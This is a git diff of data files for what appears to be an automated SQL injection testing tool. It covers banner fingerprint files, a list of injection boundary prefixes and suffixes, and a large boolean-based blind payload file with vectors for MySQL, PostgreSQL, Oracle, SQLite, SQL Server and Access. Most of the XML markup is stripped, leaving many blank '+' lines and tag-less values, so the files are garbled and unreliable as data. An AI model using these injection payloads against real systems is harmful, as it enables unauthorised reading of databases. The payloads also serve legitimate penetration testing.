-670,12 +834,110 @@ - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/xml/banner/servlet.xml b/data/xml/banner/servlet-engine.xml similarity index 64% rename from xml/banner/servlet.xml rename to data/xml/banner/servlet-engine.xml index 75106859d74..c34d9617e1b 100644 --- a/xml/banner/servlet.xml +++ b/data/xml/banner/servlet-engine.xml @@ -3,10 +3,18 @@ - + + + + + + + + + diff --git a/data/xml/banner/set-cookie.xml b/data/xml/banner/set-cookie.xml new file mode 100644 index 00000000000..6f7bed59c02 --- /dev/null +++ b/data/xml/banner/set-cookie.xml @@ -0,0 +1,93 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git 
a/xml/banner/sharepoint.xml b/data/xml/banner/sharepoint.xml similarity index 100% rename from xml/banner/sharepoint.xml rename to data/xml/banner/sharepoint.xml diff --git a/xml/banner/x-aspnet-version.xml b/data/xml/banner/x-aspnet-version.xml similarity index 100% rename from xml/banner/x-aspnet-version.xml rename to data/xml/banner/x-aspnet-version.xml diff --git a/data/xml/banner/x-powered-by.xml b/data/xml/banner/x-powered-by.xml new file mode 100644 index 00000000000..f52fd9aad2a --- /dev/null +++ b/data/xml/banner/x-powered-by.xml @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/data/xml/boundaries.xml b/data/xml/boundaries.xml new file mode 100644 index 00000000000..ccf93177a58 --- /dev/null +++ b/data/xml/boundaries.xml @@ -0,0 +1,576 @@ + + + + + + + + 3 + 1 + 1,2 + 1 + ) + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 2 + ') + [GENERIC_SQL_COMMENT] + + + + 3 + 1,2,3 + 1,2 + 2 + ' + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 4 + " + [GENERIC_SQL_COMMENT] + + + + + + 1 + 1 + 1,2 + 1 + ) + AND ([RANDNUM]=[RANDNUM] + + + + 2 + 1 + 1,2 + 1 + )) + AND (([RANDNUM]=[RANDNUM] + + + + 3 + 1 + 1,2 + 1 + ))) + AND ((([RANDNUM]=[RANDNUM] + + + + 1 + 0 + 1,2,3 + 1 + + + + + + 1 + 1 + 1,2 + 2 + ') + AND ('[RANDSTR]'='[RANDSTR] + + + + 2 + 1 + 1,2 + 2 + ')) + AND (('[RANDSTR]'='[RANDSTR] + + + + 3 + 1 + 1,2 + 2 + '))) + AND ((('[RANDSTR]'='[RANDSTR] + + + + 1 + 1 + 1,2 + 2 + ' + AND '[RANDSTR]'='[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + ') + AND ('[RANDSTR]' LIKE '[RANDSTR] + + + + 3 + 1 + 1,2 + 3 + ')) + AND (('[RANDSTR]' LIKE '[RANDSTR] + + + + 4 + 1 + 1,2 + 3 + '))) + AND ((('[RANDSTR]' LIKE '[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + %' + AND '[RANDSTR]%'='[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + ' + AND '[RANDSTR]' LIKE '[RANDSTR] + + + + 2 + 1 + 1,2 + 4 + ") + AND ("[RANDSTR]"="[RANDSTR] + + + + 3 + 1 + 1,2 + 4 + ")) + AND (("[RANDSTR]"="[RANDSTR] + + + + 4 + 1 + 1,2 + 4 + "))) + AND ((("[RANDSTR]"="[RANDSTR] + + + + 2 + 1 + 1,2 + 4 + " + AND "[RANDSTR]"="[RANDSTR] + + + + 3 + 1 + 1,2 + 5 + ") + AND ("[RANDSTR]" LIKE "[RANDSTR] + + + + 4 + 1 + 1,2 + 5 + ")) + AND (("[RANDSTR]" LIKE "[RANDSTR] + + + + 5 + 1 + 1,2 + 5 + "))) + AND ((("[RANDSTR]" LIKE "[RANDSTR] + + + + 3 + 1 + 1,2 + 5 + " + AND "[RANDSTR]" LIKE "[RANDSTR] + + + + 1 + 1 + 1,2 + 1 + + [GENERIC_SQL_COMMENT] + + + + 3 + 1 + 1,2 + 1 + + # [RANDSTR] + + + + + 3 + 1 + 1,2 + 2 + ' + OR '[RANDSTR1]'='[RANDSTR2] + + + + + + 5 + 9 + 1,2 + 2 + ') WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1,2 + 2 + ") WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 1 + ) WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 2 + ' WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1,2 + 4 + " WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 1 + WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1 + 2 + '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )||' + + + + 5 + 9 + 1 + 2 + '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )||' + + + + 5 + 9 + 1 + 2 + '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+' + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 1 + +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+ + + + + 5 + 9 + 1 + 2 + '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+' + 
+ + + + + 5 + 1 + 1,2 + 2 + ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 2 + ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 1 + )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 2 + ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 4 + ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 1 + ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1 + 1 + ` WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1 + 1 + `) WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + + + 4 + 8 + 1 + 6 + `=`[ORIGINAL]` + AND `[ORIGINAL]`=`[ORIGINAL] + + + + 5 + 8 + 1 + 6 + "="[ORIGINAL]" + AND "[ORIGINAL]"="[ORIGINAL] + + + + 5 + 8 + 1 + 6 + ]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM] + )|[[ORIGINAL] + + + + + 5 + 7 + 1 + 3 + [RANDSTR1], + [RANDSTR2] + + + + + 4 + 1 + 1 + 2 + ' IN BOOLEAN MODE) + # + + + diff --git a/data/xml/errors.xml b/data/xml/errors.xml new file mode 100644 index 00000000000..605ffacd9a9 --- /dev/null +++ b/data/xml/errors.xml @@ -0,0 +1,248 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml new file mode 100644 index 00000000000..0cf17140456 --- /dev/null +++ b/data/xml/payloads/boolean_blind.xml @@ -0,0 +1,1612 @@ + + + + + + + + AND boolean-based blind - WHERE or HAVING clause + 1 + 1 + 1 + 1,8,9 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + + + AND [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause + 1 + 1 + 3 + 1,9 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + + + OR [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (NOT) + 1 + 3 + 3 + 1,9 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + + + OR NOT [RANDNUM]=[RANDNUM1] + + + + + AND boolean-based blind - WHERE or HAVING clause (subquery - comment) + 1 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + OR boolean-based blind - WHERE or HAVING clause (subquery - comment) + 1 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + AND boolean-based blind - WHERE or HAVING clause (comment) + 1 + 2 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + 
[GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (comment) + 1 + 2 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (NOT - comment) + 1 + 4 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + OR NOT [RANDNUM]=[RANDNUM1] + + + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + # + + + AND [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
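To make the boundary and test templates above concrete: a test's vector (e.g. AND [INFERENCE]) is wrapped by a boundary's prefix and suffix, and the bracketed placeholders are filled with random values before the request is sent. A minimal sketch of that assembly in Python (the helper names and the exact join logic are assumptions for illustration, not sqlmap's actual code):

    import random
    import string

    def rand_num():
        # value used to fill [RANDNUM]-style placeholders
        return str(random.randint(1000, 9999))

    def rand_str(length=6):
        # value used to fill [RANDSTR]-style placeholders
        return "".join(random.choice(string.ascii_lowercase) for _ in range(length))

    def render(template, inference=""):
        # fill the placeholders used by the XML templates above; str.replace()
        # gives every [RANDSTR] occurrence the same value, so a suffix such as
        # AND '[RANDSTR]'='[RANDSTR] stays a true condition
        return (template.replace("[INFERENCE]", inference)
                        .replace("[RANDNUM]", rand_num())
                        .replace("[RANDSTR]", rand_str()))

    def build_value(original, prefix, vector, suffix, inference):
        # original parameter value + boundary prefix + rendered vector + boundary suffix
        return "{}{} {} {}".format(original, prefix, render(vector, inference), render(suffix))

    print(build_value("1", "'", "AND [INFERENCE]", "AND '[RANDSTR]'='[RANDSTR]",
                      "ASCII(SUBSTRING(version(),1,1))>52"))
    # e.g. 1' AND ASCII(SUBSTRING(version(),1,1))>52 AND 'tkbuqe'='tkbuqe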
+ + + OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + # + + + OR [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) + 1 + 3 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + # + + + OR NOT [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + %16 + + + AND [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + %16 + + + OR [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + 1 + 2 + 1 + 1,2,3 + 1 + RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) + + RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) + + + RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END)) + +
+ MySQL +
+
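Each test entry above also carries a level and a risk value alongside its title, and payloads are only attempted when they do not exceed the user-supplied thresholds (the --level/--risk options). A rough sketch of that gating, using a hypothetical in-memory form of two of the entries above:

    # hypothetical in-memory form of two of the test entries above
    TESTS = [
        {"title": "AND boolean-based blind - WHERE or HAVING clause",
         "level": 1, "risk": 1, "vector": "AND [INFERENCE]"},
        {"title": "OR boolean-based blind - WHERE or HAVING clause (NOT)",
         "level": 3, "risk": 3, "vector": "OR NOT [INFERENCE]"},
    ]

    def usable_tests(tests, max_level, max_risk):
        # keep only the payloads allowed by the requested thresholds
        return [t for t in tests if t["level"] <= max_level and t["risk"] <= max_risk]

    for test in usable_tests(TESTS, max_level=1, max_risk=1):
        print(test["title"])   # only the first (level 1 / risk 1) entry is printed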
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) + 1 + 3 + 1 + 1,2,3,8 + 1 + AND MAKE_SET([INFERENCE],[RANDNUM]) + + AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) + 1 + 3 + 3 + 1,2,3 + 2 + OR MAKE_SET([INFERENCE],[RANDNUM]) + + OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) + 1 + 4 + 1 + 1,2,3,8 + 1 + AND ELT([INFERENCE],[RANDNUM]) + + AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) + 1 + 4 + 3 + 1,2,3 + 2 + OR ELT([INFERENCE],[RANDNUM]) + + OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 1 + 5 + 1 + 1,2,3,8 + 1 + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) + + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) + + + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 1 + 5 + 3 + 1,2,3,8 + 2 + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) + + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) + + + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) + +
+ MySQL +
+
+ + + PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST) + 1 + 2 + 1 + 1,8 + 1 + AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + +
+ PostgreSQL +
+
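Payloads like the CAST one above work because a FALSE condition breaks the query and visibly changes the response, so something still has to decide, per request, whether the page "looks TRUE". One common way to do that (a sketch of the general idea only, not sqlmap's exact comparison logic or constants) is a sequence-similarity ratio against a reference TRUE page:

    from difflib import SequenceMatcher

    def looks_true(page, true_page, threshold=0.98):
        # responses to TRUE conditions should stay near-identical to the
        # reference TRUE page; FALSE conditions change or remove content
        return SequenceMatcher(None, page, true_page).ratio() >= threshold

    true_page = "<html><body>Welcome back, admin. Orders: 14</body></html>"
    false_page = "<html><body>Internal server error</body></html>"
    print(looks_true(true_page, true_page))    # True
    print(looks_true(false_page, true_page))   # False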
+ + + PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST) + 1 + 3 + 3 + 1 + 2 + OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + +
+ PostgreSQL +
+
+ + + Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 1 + 2 + 1 + 1 + 1 + AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + +
+ Oracle +
+
+ + + Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 1 + 3 + 3 + 1 + 2 + OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + +
+ Oracle +
+
+ + + SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 2 + 1 + 1 + 1 + AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
+ + + SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 3 + 3 + 1 + 2 + OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
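All of the WHERE/HAVING tests above reduce data retrieval to yes/no questions: [INFERENCE] is filled with a comparison over one character of the value being extracted, and the answers drive a binary search. A compact sketch of that loop (ask() is a hypothetical oracle standing in for "send the request and classify the response"; it is not part of sqlmap's API):

    def extract_char(ask, query, position):
        # binary search over printable ASCII driven by TRUE/FALSE answers
        low, high = 32, 126
        while low < high:
            mid = (low + high) // 2
            if ask("ASCII(SUBSTRING(({0}),{1},1))>{2}".format(query, position, mid)):
                low = mid + 1
            else:
                high = mid
        return chr(low)

    def extract_value(ask, query, length):
        return "".join(extract_char(ask, query, i) for i in range(1, length + 1))

    # offline demo: a fake oracle that checks the condition against a known secret
    secret = "admin"
    def fake_ask(condition):
        position = int(condition.split(",")[-2])
        threshold = int(condition.rsplit(">", 1)[1])
        return ord(secret[position - 1]) > threshold

    print(extract_value(fake_ask, "SELECT current_user", len(secret)))   # admin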
+ + + + + + Boolean-based blind - Parameter replace (original value) + 1 + 1 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + MySQL boolean-based blind - Parameter replace (MAKE_SET) + 1 + 4 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[RANDNUM]) + + MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) + 1 + 5 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[ORIGVALUE]) + + MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (ELT) + 1 + 4 + 1 + 1,2,3 + 3 + ELT([INFERENCE],[RANDNUM]) + + ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (ELT - original value) + 1 + 5 + 1 + 1,2,3 + 3 + ELT([INFERENCE],[ORIGVALUE]) + + ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) + + + ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (bool*int) + 1 + 4 + 1 + 1,2,3 + 3 + ([INFERENCE])*[RANDNUM] + + ([RANDNUM]=[RANDNUM])*[RANDNUM1] + + + ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (bool*int - original value) + 1 + 5 + 1 + 1,2,3 + 3 + ([INFERENCE])*[ORIGVALUE] + + ([RANDNUM]=[RANDNUM])*[ORIGVALUE] + + + ([RANDNUM]=[RANDNUM1])*[ORIGVALUE] + +
+ MySQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) + 1 + 5 + 1 + 1,2,3 + 3 + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) + 1 + 5 + 1 + 1,2,3 + 3 + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
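The "Parameter replace (original value)" entries differ from the AND/OR tests in that the whole parameter value is swapped out: [ORIGVALUE] makes the expression evaluate back to the original value when the inference holds, so a TRUE condition returns the normal page while a FALSE one breaks the query. A small rendering sketch using the PostgreSQL template shown earlier (the helper is illustrative, not sqlmap's code):

    def render_replace(template, original_value, inference):
        # [ORIGVALUE] makes the expression evaluate back to the original
        # parameter value when the condition is TRUE; the ELSE branch
        # (division by zero) makes a FALSE condition visibly break the query
        return (template.replace("[ORIGVALUE]", original_value)
                        .replace("[INFERENCE]", inference))

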